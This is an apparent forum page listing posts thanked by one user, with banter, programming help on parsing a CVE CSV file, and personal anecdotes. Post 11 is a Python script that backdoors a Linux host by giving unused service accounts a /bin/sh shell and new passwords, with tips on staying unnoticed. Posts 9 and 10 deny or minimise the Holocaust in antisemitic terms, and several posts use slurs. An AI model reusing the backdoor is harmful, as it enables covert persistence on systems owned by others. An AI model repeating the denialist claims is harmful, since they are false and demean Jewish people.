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Posts That Were Thanked by Sophie

  1. Originally posted by Sophie I'd like an artistic impression of what i might look like in §m£ÂgØL's eyes if he knew me irl.

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  2. Originally posted by LegalizeSpiritualDiscovery Lol

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  3. The following users say it would be alright if the author of this post didn't die in a fire!
  4. CASPER Soldier of Fourchin
    This kind of cringe can't exist in the wild. It took the careful nurturing of our little petri dish to come up with something so awe-inspiringly retarded.
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  5. LegalizeSpiritualDiscovery Space Nigga [my yellow-marked arboreous hypnotist]
    Originally posted by Ajax Compared these two and tell me which one is sexier:

    Obviously biased. She smirks and needlessly flicks her hair aside in the first one. In the second, she scrunches her face and then looks confused and unsatisfied afterward. UNSCIENTIFIC!
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  6. NARCassist gollums fat coach
    Originally posted by Ajax How do I fight a hurricane?

    well the germans used focke-wulfs, but it didn't work.

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  7. Looks like parmesan
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  8. mmQ Lisa Turtle
    Originally posted by Narc i've lost everything quite a few times in my life so i realize exactly how free that does actually make you. its almost refreshing when it happens now.


    Same here m8. Easy come, easy go, as they say. I've had some very "valuable" possessions of mine lost over the years, and aside from the initial heartbreak, I've gotten over it. If it's not living or breathing, I really don't give a shit. I can always start again.

    CHOOTIE, on the other hand. Man, I have almost lost her twice and those were some of the saddest days of my life.

    OK quick story time.

    I bought her when I lived in Tampa, when she was just a lil babby. I lived there until she was about 1 year old and then I decided to move back home, so I made the arrangements to have her be able to fly with me under my seat in a little carrier, and it was all set. 2 days before my flight, I got home after work and eventually noticed that she wasn't around. After looking and not finding her I asked my roommate who said that he let her outside to play, which obviously pissed me off, but it was what it was.

    Anyway, I looked all over and never found her. I regretfully accepted that she had just went into the wilderness and that was that. It fucking sucked.

    So I was sitting on the back patio with my other roommate a few hours before my flight, smoking a bowl, and sort of talking about her and whatnot, and then all of a sudden I look up and see her slowly coming prancing up from the tall grass out in the lawn, and mannn, I can't even describe the happiness that washed over me as I saw her coming toward me. It was like a moment from a fucking movie, last minute shit, reunited. I will never forget that moment.
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  9. aldra JIDF Controlled Opposition

    Excellent article, more or less details what I've been saying for a long time - there's nothing special or unique about NSDAP Germany's crimes; they're invoked as a bogeyman for political goals.

    Though an image is probably stronger, the words “Nazi” and “pedophile” often have the same effect: to make us stop thinking and agree to anything to stop the putative Nazi and/or pedophiles. All that’s left is to give a name like “Protecting Our Children from Pedophile Nazis law” and you can pass anything, even laws justifying torture, arbitrary arrest or daily mandatory cavity searches for the entire population.

    It is often said that there is a need for, I kid you not, “Holocaust education” to make absolutely sure that “such an abomination does not happen again”. Not happen again?! It never stopped!!! The decolonization of Africa was a bloodbath, US wars in Korea and Vietnam killed millions of people, as did the US sponsored civil war in Indonesia. The Cambodian genocide, the Bangladesh war of Independence, Mozambican Civil War – all saw millions of people murdered. More recently, the Soviet invasion of Afghanistan, the genocide in Rwanda, the US occupation of Iraq, the 2nd Congo war – they all killed several million of people. It is obscene, grotesque and outrageous to say “never again” if in reality it never stopped.
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  10. aldra JIDF Controlled Opposition
    Originally posted by Totse 2001 Who cares if it's only 600 thousand who died. they were murdered by SS.

    yeah, who cares about facts anyway?

    I don't believe there was any plan to exterminate the jedis.

    many were removed from government positions and they felt the wrath of the German majority for various reasons. many were deported, and later in the war many were pressed into slave labour (which, morally, is on par with just killing them).

    the most important point is, though, that jedi suffering in WWII was not unique. many suffered in exactly the same ways and worse, yet terms like 'holocaust' and 'antisemitic' were invented to elevate jedi suffering above the rest - 'genocide' and 'racist' would've done fine.

    I would contend that the chinese were forced to eat the most shit (by imperial japan) in WWII, and even though they still largely hate japan, they don't feel the need to base their entire ethnic identity around victimhood.
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  11. mempodippy Yung Blood

    #!/usr/bin/env python

    # so this is something i made in about 20-30 minutes because i was looking at old threads and saw someone say something along the lines of
    # "change the login shell of an unused account to /bin/sh and change the password of the account"
    # the context of what they said is lost to me, i don't remember why they said what they said
    # but here u go. how to convolute one sed command or a tiny bit of file editing and password changing in 90 lines :D
    # i do feel autistic but i was very bored

    # whipped up with python 3.6.2 in mind, but the changes won't be too drastic if you want this to work on older versions

    # changing the login shell of an unused account is less noticeable than adding a completely new user, but once the password for the existing user
    # has been changed, the hashed password will show up in /etc/shadow. only people able to see the pw hash in shadow though are users with root privs.
    # normal users (on most default setups) can read /etc/passwd and see that an account like mail or some shit has a /bin/sh login shell. SKETCH SKETCH SKETCH

    # moral of the story: just use rootkits


    import os
    if os.getuid() != 0:
    print(" [-] not root, exiting")

    # some people like to be gay
    PASSWD = "/etc/passwd"
    # add usernames to this list and the script will ignore them completely
    IGNORE_USR = ["root"]
    # only look for accounts in /etc/passwd which login shells equal below
    SEEK_LOGIN_SHELL = ["/usr/bin/nologin", "/sbin/nologin", "/bin/false"]
    # new shell to replace above with
    NEW_SHELL = "/bin/sh"

    if not os.path.exists(PASSWD):
    print("[-] passwd file {0} doesn't exist".format(PASSWD))

    # get usernames from /etc/passwd based on which accounts are being ignored and which accounts adhere to which login shells to look for
    # ask user which account they would like to 'backdoor'
    # change last parameter "/sbin/nologin" "/usr/bin/nologin" or"/bin/false" to "/bin/sh"
    # change password of specified account

    def split_passwd():
    passwd_fd = open(PASSWD, "r") # open /etc/passwd for reading
    l_passwd ="\n") # split /etc/passwd by every newline character
    return l_passwd

    # the difference between this and seek_passwd_uname() is that this searches for all usernames in /etc/passwd. the one below searches for one specific account and returns that account line as a list
    def seek_passwd_unames():
    l_passwd = split_passwd()
    unames = []
    for x in l_passwd:
    l_x = x.split(":") # split each line by every colon separator
    if l_x[0] in IGNORE_USR: continue # if we find a user we want to ignore, skip this iteration of the loop and move onto the next line of /etc/passwd
    if l_x[-1] in SEEK_LOGIN_SHELL: unames.append(l_x[0]) # we've cut down the users in /etc/passwd to the users we want and can add said users to our list for later
    return unames

    # find specified account entry line in /etc/passwd
    def seek_passwd_uname(user):
    l_passwd = split_passwd()
    for x in l_passwd:
    l_x = x.split(":")
    if l_x[0] == user: return x.split(":")
    print("[-] error. couldn't find specified user in {0}. wtf ???????".format(PASSWD))

    # replace old login shell option in list with new shell and build new /etc/passwd account entry string
    def change_acc_shell(ent):
    new_ent = ent
    for x in SEEK_LOGIN_SHELL:
    if ent[-1] == x:
    new_ent = [acc.replace(x, NEW_SHELL) for acc in new_ent] # replace default login shell with our new specified shell (default /bin/sh)
    return ':'.join(map(str, new_ent)) # build new /etc/passwd account entry

    def replace_acc_entry(old, new):
    passwd_fd = open(PASSWD, "r+")
    o_passwd_contents =
    n_passwd_contents = o_passwd_contents.replace(':'.join(map(str, old)), new)

    if __name__ == "__main__":
    print("[+] starting")
    users = seek_passwd_unames()
    print("[+] available currently unused accounts:\n" + ','.join(map(str, users)))
    acc = ""
    while not acc in users:
    acc = input("[!] which account would you like to use?: ")
    if not acc in users: print("[-] you specified an unavailable account fucko, try again")
    else: break

    new_entry = change_acc_shell(seek_passwd_uname(acc))

    print("[+] replacing old account entry in {0} with new account".format(PASSWD))
    replace_acc_entry(seek_passwd_uname(acc), new_entry)

    print("[+] account entry changed. changing password for account")
    os.system("passwd {0}".format(acc)) # fucking SUE ME

    print("[+] finished")

    oh also the times of file modifications to /etc/passwd (when no new account has been added) and shadow will give off an indication that something's weird

    Post last edited by mempodippy at 2017-08-30T03:34:24.769061+00:00
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  12. Lanny Bird of Courage
    Originally posted by Erorr Those glasses and that haircut look like a 13 year olds wet dream of style. Poor feller

    His sense of style has since improved, now he has specialized autism sunglasses that block out peripheral vision because it's just too intense to look at multiple things.
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  13. Lanny Bird of Courage
    There's no general way to ask "does my string occurs in this dictionary" because it's not really obvious what "occurs in" would mean. It's like asking "what's the sum of this number and this sting", the operation isn't defined over those types. When you write `if 'foo' in my_dict:` what you're asking is "is 'foo' one of the keys in my_dict`. You probably want to search within a specific field in each row (like if someone types in "apache" there's not much point in looking at the CVE column since the string "apache" is never going to appear there). If you really want to search every field you'd have to do something like this instead:

    query = raw_input("wut vuln m8?: ")

    with open('cve_mitre.csv', 'rb') as infile:
    csv_reader = csv.DictReader(infile)
    rows = [row for row in csv_reader]
    for row in rows:
    for col_name in row:
    if query in row[col_name]:
    print json.dumps(row)

    Note what gets sent to json.dumps doesn't need to be wrapped in this case since it (the vulnerability row) is already a dictionary.
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  14. kroz weak whyte, frothy cuck, and former twink
    Its actually not bad at all like the media portrayed it. 3 years ago it was a lot worse here in austin and people died and it didn't make nearly as much media attention.

    its just the coast that saw most of the action. Austin is central, but we definitely had a lot of rain, its still raining actually, its not even really the rain thats the problem, its just its really windy so it looks scary.

    the maintenance guys put up sand bags to prevent the first floor from flooding, but it didn't even get anywhere close to that happening like its done every other year.

    heres the flood from a few years ago it was a lot more rowdy

    to me a flood is a lot more scary, this hurricane was downgraded to a tropical storm.

    the next town over georgetown, a bunch of people and there expensive houses died, fucking crazy

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  15. Lanny Bird of Courage
    Also I have no idea what you think "proprietary information" means, but I know you're wrong about it.
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  16. Lanny Bird of Courage
    Originally posted by -SpectraL In a .NET executable, the PE code section contains a stub that invokes the CLR virtual machine startup entry, _CorExeMain or _CorDllMain in mscoree.dll, much like it was in Visual Basic executables. The virtual machine then makes use of .NET metadata present, the root of which, IMAGE_COR20_HEADER (also called "CLR header") is pointed to by IMAGE_DIRECTORY_ENTRY_COMHEADER[5] entry in the PE header's data directory. IMAGE_COR20_HEADER strongly resembles PE's optional header, essentially playing its role for the CLR loader.

    The CLR-related data, including the root structure itself, is typically contained in the common code section, .text. It is composed of a few directories: metadata, embedded resources, strong names and a few for native-code interoperability. Metadata directory is a set of tables that list all the distinct .NET entities in the assembly, including types, methods, fields, constants, events, as well as references between them and to other assemblies.

    If you knew what half those words meant you'd realize how stupid copy pasting a section of an irrelevant wikipedia article that happened to contain the word "metadata" makes you look
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  17. Lanny Bird of Courage
    Originally posted by Sophie So i ahve a big CSV file that is formatted like this.

    CVE-1999-0026,Entry,"root privileges via buffer overflow in pset command on SGI IRIX systems.","CERT:CA-97.21.sgi_buffer_overflow   |   AUSCERT:AA-97.20.IRIX.pset.buffer.overflow.vul

    I want to use Python's JSON module to make it look more like this:

    Entry,"root privileges via buffer overflow in pset command on SGI IRIX systems.",
    "CERT:CA-97.21.sgi_buffer_overflow | AUSCERT:AA-97.20.IRIX.pset.buffer.overflow.vul

    If i can do that without the JSON module that'd be ok too. As usual we are talking Python here.

    The first thing you want to think about is the most natural way to represent these entries in JSON. Rather than representing them as a sequence it seems like key/values would make more sense. Usually CSV files come with row names at the top. Assuming that's the case you could do something like this:

    import csv
    import json

    import StringIO

    sample_csv = """cve_id,type,description,whatever
    CVE-1999-0026,Entry,"root privileges via buffer overflow in pset command on SGI IRIX systems.","CERT:CA-97.21.sgi_buffer_overflow | AUSCERT:AA-97.20.IRIX.pset.buffer.overflow.vul"
    CVE-1999-0027,Entry,"root privileges via buffer overflow in pset command on SGI IRIX systems.","CERT:CA-97.21.sgi_buffer_overflow | AUSCERT:AA-97.20.IRIX.pset.buffer.overflow.vul"

    if __name__ == '__main__':
    pseudo_file = StringIO.StringIO(sample_csv)
    csv_reader = csv.DictReader(pseudo_file)

    rows = [row for row in csv_reader]

    print json.dumps({'vulns': rows})

    which produces this (after formatting):

    "vulns": [
    "whatever": "CERT:CA-97.21.sgi_buffer_overflow | AUSCERT:AA-97.20.IRIX.pset.buffer.overflow.vul",
    "type": "Entry",
    "description": "root privileges via buffer overflow in pset command on SGI IRIX systems.",
    "cve_id": "CVE-1999-0026"
    "whatever": "CERT:CA-97.21.sgi_buffer_overflow | AUSCERT:AA-97.20.IRIX.pset.buffer.overflow.vul",
    "type": "Entry",
    "description": "root privileges via buffer overflow in pset command on SGI IRIX systems.",
    "cve_id": "CVE-1999-0027"

    You can ignore the StringIO stuff, it's just a way to make a file-like object out of a string (csv.DictReader accepts a file-like object) but you'll have a real file.

    Also worth pointing out that the `rows` list (a list of dictionaries built from the rows of the CSV file) gets wrapped in a dict before being passed to `json.dumps`. You don't _have_ to do this, json.dumps will accept a list, but strictly speaking plain arrays are not valid JSON, per the spec every piece of JSON must decode to exactly one object. That object can have keys which are arrays but the top level must be an object (map from keys to values, equivalent to python's "dictionary" type).
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  18. Lanny Bird of Courage
    Spend years in solitude there, in deep meditation, trying to discover what strange confluence of psychological traumas induces you to tell lies no one believes for a moment consistently for years and years on end.
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  19. Lanny Bird of Courage
    Originally posted by aldra

    mysql> SHOW DATABASES;
    | Database |
    | information_schema |
    | kids |
    | mysql |
    | pride |
    | wordpress |
    6 rows in set (0.00 sec)

    mysql> USE kids;
    Database changed

    [lanny:~/anatomy]$ ls
    elbow penis tities
    [lanny:~/anatomy]$ touch penis
    [lanny:~/anatomy]$ cat penis
    meow, meow--- squirt
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  20. benny vader YELLOW GHOST
    Originally posted by infinityshock I've heard that since my first public speaking fiasco. my preference is to fantasize about having them on their knees with my testicles in one or more of their orifices.

    have done it with an admiral…

    that makes you a rear admiral.
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